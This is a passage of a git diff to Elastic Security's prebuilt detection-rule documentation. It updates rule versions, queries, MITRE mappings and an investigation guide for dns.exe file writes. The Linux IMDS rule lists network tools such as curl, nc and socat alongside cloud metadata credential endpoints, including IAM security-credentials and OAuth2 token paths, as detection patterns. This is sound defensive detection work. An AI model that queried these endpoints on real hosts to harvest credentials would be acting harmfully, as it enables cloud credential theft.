+ +[source, js] +---------------------------------- +event.category:iam and event.code:"4674" and +winlog.event_data.PrivilegeList:"SeIncreaseBasePriorityPrivilege" and event.outcome:"success" and +winlog.event_data.AccessMask:"512" and not winlog.event_data.SubjectUserSid:("S-1-5-18" or "S-1-5-19" or "S-1-5-20") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Access Token Manipulation +** ID: T1134 +** Reference URL: https://attack.mitre.org/techniques/T1134/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-windows-powershell-arguments.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-powershell-arguments.asciidoc index a8bfc097fe..a705cd458e 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-windows-powershell-arguments.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-powershell-arguments.asciidoc @@ -44,7 +44,7 @@ Identifies the execution of PowerShell with suspicious argument values. This beh * Data Source: Elastic Endgame * Resources: Investigation Guide -*Version*: 208 +*Version*: 209 *Rule authors*: @@ -111,7 +111,7 @@ process where host.os.type == "windows" and event.type == "start" and process.name : "powershell.exe" and not ( - user.id == "S-1-5-18" and + ?user.id == "S-1-5-18" and /* Don't apply the user.id exclusion to Sysmon for compatibility */ not event.dataset : ("windows.sysmon_operational", "windows.sysmon") ) and diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-file-operation-by-dns-exe.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-file-operation-by-dns-exe.asciidoc index 410d2995e8..2499a0954e 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-file-operation-by-dns-exe.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-file-operation-by-dns-exe.asciidoc @@ -38,8 +38,9 @@ Identifies an unexpected file being modified by dns.exe, the process responsible * Use Case: Vulnerability * Data Source: Elastic Defend * Data Source: Sysmon +* Resources: Investigation Guide -*Version*: 215 +*Version*: 216 *Rule authors*: @@ -48,6 +49,51 @@ Identifies an unexpected file being modified by dns.exe, the process responsible *Rule license*: Elastic License v2 +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Unusual File Operation by dns.exe* + + +The rule flags Windows DNS Server (dns.exe) creating, changing, or deleting files that aren’t typical DNS zone or log files, which signals exploitation for code execution or abuse to stage payloads for lateral movement. After gaining execution in dns.exe via DNS RPC or parsing bugs, attackers often write a malicious EXE into System32 and register a new service, leveraging the trusted service context on a domain controller to persist and pivot. + + +*Possible investigation steps* + + +- Validate the modified file’s full path, type, and provenance, prioritizing writes in %SystemRoot%\System32, NETLOGON, or SYSVOL, and confirm signature, hash reputation, and compile timestamp to rapidly classify the artifact. +- Pivot to persistence telemetry around the same timestamp by hunting for new services or scheduled tasks (e.g., SCM 7045, Security 4697, TaskScheduler 106/200) and registry autoruns that reference the file. +- Correlate with DNS service network activity and logs for unusual RPC calls, authenticated connections from non-admin hosts, or spikes in failures/crashes that could indicate exploitation. +- Inspect the service’s runtime state for injection indicators by reviewing recent module loads, unsigned DLLs, suspicious memory sections, and ETW/Sysmon events mapping threads that performed the write. +- If the file is executable or a script or placed in execution-friendly locations, detonate it in a sandbox and scope the blast radius by pivoting on its hash, filename, and path across the fleet. + + +*False positive analysis* + + +- DNS debug logging configured to write to a file with a non-.log extension (e.g., .txt) causes dns.exe to legitimately create or rotate that file during troubleshooting. +- An administrator exports a zone to a custom-named file with a nonstandard extension (e.g., .txt or .xml), leading dns.exe to create or modify that file as part of routine maintenance. + + +*Response and remediation* + + +- Isolate the host by removing it from DNS rotation and restricting network access to management-only, then capture and quarantine any files dns.exe created or modified outside %SystemRoot%\System32\Dns or with executable extensions. +- Delete or quarantine suspicious artifacts written by dns.exe (e.g., .exe, .dll, .ps1, .js) in %SystemRoot%\System32, NETLOGON, or SYSVOL, record their hashes, and block them fleetwide via EDR or application control. +- Remove persistence by disabling and deleting any new or altered Windows services, scheduled tasks, or Run/Autorun registry entries that reference the dns.exe-written file path, and restore legitimate service ImagePath values. +- Recover by repairing system files with SFC/DISM, restoring affected directories from known-good backups, and restarting the DNS service, then validate zone integrity, AD replication, and client name-resolution. +- Immediately escalate to incident response if dns.exe wrote an executable or script into NETLOGON or SYSVOL or if a service binary path was changed to point to a newly dropped file, indicating probable domain controller compromise and lateral movement. +- Harden by applying the latest Windows Server DNS patches, enforcing WDAC/AppLocker to block execution from SYSVOL/NETLOGON and restrict dns.exe writes to the DNS and log directories, and enable auditing on service creation and file writes in System32/NETLOGON/SYSVOL. + + ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-instance-metadata-service-imds-api-request.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-instance-metadata-service-imds-api-request.asciidoc index 8eea8c971c..9f5311f2c7 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-instance-metadata-service-imds-api-request.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-instance-metadata-service-imds-api-request.asciidoc @@ -23,10 +23,12 @@ This rule identifies potentially malicious processes attempting to access the cl *References*: * https://hackingthe.cloud/aws/general-knowledge/intro_metadata_service/ +* https://www.wiz.io/blog/imds-anomaly-hunting-zero-day *Tags*: * Domain: Endpoint +* Domain: Cloud * OS: Linux * Use Case: Threat Detection * Tactic: Credential Access @@ -34,7 +36,7 @@ This rule identifies potentially malicious processes attempting to access the cl * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -96,43 +98,112 @@ The Instance Metadata Service (IMDS) API provides essential instance-specific da [source, js] ---------------------------------- -sequence by host.id, process.parent.entity_id with maxspan=1s -[process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and - process.parent.executable != null and - ( - process.name : ( - "curl", "wget", "python*", "perl*", "php*", "ruby*", "lua*", "telnet", "pwsh", - "openssl", "nc", "ncat", "netcat", "awk", "gawk", "mawk", "nawk", "socat", "node" - ) or - process.executable : ( - "./*", "/tmp/*", "/var/tmp/*", "/var/www/*", "/dev/shm/*", "/etc/init.d/*", "/etc/rc*.d/*", - "/etc/cron*", "/etc/update-motd.d/*", "/boot/*", "/srv/*", "/run/*", "/etc/rc.local" - ) or - process.command_line: "*169.254.169.254*" - ) - and not process.working_directory: ( - "/opt/rapid7*", - "/opt/nessus*", - "/snap/amazon-ssm-agent*", - "/var/snap/amazon-ssm-agent/*", - "/var/log/amazon/ssm/*", - "/srv/snp/docker/overlay2*", - "/opt/nessus_agent/var/nessus/*") - and not process.executable: ( - "/opt/rumble/bin/rumble-agent*", - "/opt/aws/inspector/bin/inspectorssmplugin", - "/snap/oracle-cloud-agent/*", - "/lusr/libexec/oracle-cloud-agent/*") - and not process.parent.executable: ( - "/usr/bin/setup-policy-routes", - "/usr/share/ec2-instance-connect/*", - "/var/lib/amazon/ssm/*", - "/etc/update-motd.d/30-banner", - "/usr/sbin/dhclient-script", - "/usr/local/bin/uwsgi", - "/usr/lib/skylight/al-extras") +sequence by host.id, process.parent.entity_id with maxspan=3s +[ + process + where host.os.type == "linux" + and event.type == "start" + and event.action == "exec" + and process.parent.executable != null + + // common tooling / suspicious names (keep broad) + and ( + process.name : ( + "curl", "wget", "python*", "perl*", "php*", "ruby*", "lua*", "telnet", "pwsh", + "openssl", "nc", "ncat", "netcat", "awk", "gawk", "mawk", "nawk", "socat", "node", + "bash", "sh" + ) + or + // suspicious execution locations (dropped binaries / temp execution) + process.executable : ( + "./*", "/tmp/*", "/var/tmp/*", "/var/www/*", "/dev/shm/*", "/etc/init.d/*", "/etc/rc*.d/*", + "/etc/cron*", "/etc/update-motd.d/*", "/boot/*", "/srv/*", "/run/*", "/etc/rc.local" + ) + or + // threat-relevant IMDS / metadata endpoints (inclusion list) + process.command_line : ( + "*169.254.169.254/latest/api/token*", + "*169.254.169.254/latest/meta-data/iam/security-credentials*", + "*169.254.169.254/latest/meta-data/local-ipv4*", + "*169.254.169.254/latest/meta-data/local-hostname*", + "*169.254.169.254/latest/meta-data/public-ipv4*", + "*169.254.169.254/latest/user-data*", + "*169.254.169.254/latest/dynamic/instance-identity/document*", + "*169.254.169.254/latest/meta-data/instance-id*", + "*169.254.169.254/latest/meta-data/public-keys*", + "*computeMetadata/v1/instance/service-accounts/*/token*", + "*/metadata/identity/oauth2/token*", + "*169.254.169.254/opc/v*/instance*", + "*169.254.169.254/opc/v*/vnics*" + ) + ) + + // global working-dir / executable / parent exclusions for known benign agents + and not process.working_directory : ( + "/opt/rapid7*", + "/opt/nessus*", + "/snap/amazon-ssm-agent*", + "/var/snap/amazon-ssm-agent/*", + "/var/log/amazon/ssm/*", + "/srv/snp/docker/overlay2*", + "/opt/nessus_agent/var/nessus/*" + ) + + and not process.executable : ( + "/opt/rumble/bin/rumble-agent*", + "/opt/aws/inspector/bin/inspectorssmplugin", + "/snap/oracle-cloud-agent/*", + "/lusr/libexec/oracle-cloud-agent/*" + ) + + and not process.parent.executable : ( + "/usr/bin/setup-policy-routes", + "/usr/share/ec2-instance-connect/*", + "/var/lib/amazon/ssm/*", + "/etc/update-motd.d/30-banner", + "/usr/sbin/dhclient-script", + "/usr/local/bin/uwsgi", + "/usr/lib/skylight/al-extras", + "/usr/bin/cloud-init", + "/usr/sbin/waagent", + "/usr/bin/google_osconfig_agent", + "/usr/bin/docker", + "/usr/bin/containerd-shim", + "/usr/bin/runc" + ) + + and not process.entry_leader.executable : ( + "/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent", + "/opt/Elastic/Agent/data/elastic-agent-*/elastic-agent", + "/opt/nessus_agent/sbin/nessus-service" + ) + + // carve-out: safe /usr/bin/curl usage (suppress noisy, legitimate agent patterns) + and not ( + process.executable == "/usr/bin/curl" + and ( + // AWS IMDSv2 token PUT that includes ttl header + (process.command_line : "*-X PUT*169.254.169.254/latest/api/token*" and process.command_line : "*X-aws-ec2-metadata-token-ttl-seconds*") + or + // Any IMDSv2 GET that includes token header for any /latest/* path + process.command_line : "*-H X-aws-ec2-metadata-token:*169.254.169.254/latest/*" + or + // Common amazon tooling UA + process.command_line : "*-A amazon-ec2-net-utils/*" + or + // Azure metadata legitimate header + process.command_line : "*-H Metadata:true*169.254.169.254/metadata/*" + or + // Oracle IMDS legitimate header + process.command_line : "*-H Authorization:*Oracle*169.254.169.254/opc/*" + ) + ) +] +[ + network where host.os.type == "linux" + and event.action == "connection_attempted" + and destination.ip == "169.254.169.254" ] -[network where host.os.type == "linux" and event.action == "connection_attempted" and destination.ip == "169.254.169.254"] ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-remote-file-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-remote-file-creation.asciidoc index ed13a90eba..5dea22a9b1 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-remote-file-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-remote-file-creation.asciidoc @@ -10,9 +10,9 @@ This rule leverages the new_terms rule type to detect file creation via a common * logs-endpoint.events.file* * auditbeat-* -*Severity*: medium +*Severity*: low -*Risk score*: 47 +*Risk score*: 21 *Runs every*: 5m @@ -31,7 +31,7 @@ This rule leverages the new_terms rule type to detect file creation via a common * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -148,7 +148,15 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit ---------------------------------- event.category:file and host.os.type:linux and event.action:creation and process.name:(scp or ftp or sftp or vsftpd or sftp-server or sync) and -not file.path:(/dev/ptmx or /run/* or /var/run/*) +not ( + file.path:( + /dev/ptmx or /run/* or /var/run/* or /home/*/.ansible/*AnsiballZ_*.py or /home/*/.ansible/tmp/ansible-tmp* or + /root/.ansible/*AnsiballZ_*.py or /tmp/ansible-chief/ansible-tmp*AnsiballZ_*.py or + /tmp/newroot/home/*/.ansible/tmp/ansible-tmp*AnsiballZ_*.py or /tmp/.ansible/tmp/ansible-tmp*AnsiballZ_*.py or + /tmp/ansible-tmp-*/AnsiballZ_*.py or /tmp/.ansible/ansible-tmp-*AnsiballZ_*.py + ) or + file.extension:(filepart or yaml or new or rpm or deb) +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-application.asciidoc index f34e47a9ff..3b133ba1c2 100644 --- a/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-application.asciidoc @@ -7,8 +7,8 @@ Identifies when a user is added as an owner for an Azure application. An adversa *Rule indices*: +* logs-azure.auditlogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies when a user is added as an owner for an Azure application. An adversa *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -30,7 +30,7 @@ Identifies when a user is added as an owner for an Azure application. An adversa * Tactic: Persistence * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -111,3 +111,11 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to a ** Name: Account Manipulation ** ID: T1098 ** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-service-principal.asciidoc b/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-service-principal.asciidoc index e667e89ffa..4ae03047f6 100644 --- a/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-service-principal.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-service-principal.asciidoc @@ -7,8 +7,8 @@ Identifies when a user is added as an owner for an Azure service principal. The *Rule indices*: +* logs-azure.auditlogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies when a user is added as an owner for an Azure service principal. The *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies when a user is added as an owner for an Azure service principal. The * Tactic: Persistence * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -113,3 +113,11 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to s ** Name: Account Manipulation ** ID: T1098 ** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/index.asciidoc b/docs/index.asciidoc index 6cf67e805a..afcaaf7cd5 100644 --- a/docs/index.asciidoc +++ b/docs/index.asciidoc @@ -97,3 +97,5 @@ include::detections/prebuilt-rules/downloadable-packages/8-19-5/prebuilt-rules-8 include::detections/prebuilt-rules/downloadable-packages/8-19-6/prebuilt-rules-8-19-6-appendix.asciidoc[] include::detections/prebuilt-rules/downloadable-packages/8-19-7/prebuilt-rules-8-19-7-appendix.asciidoc[] + +include::detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-appendix.asciidoc[]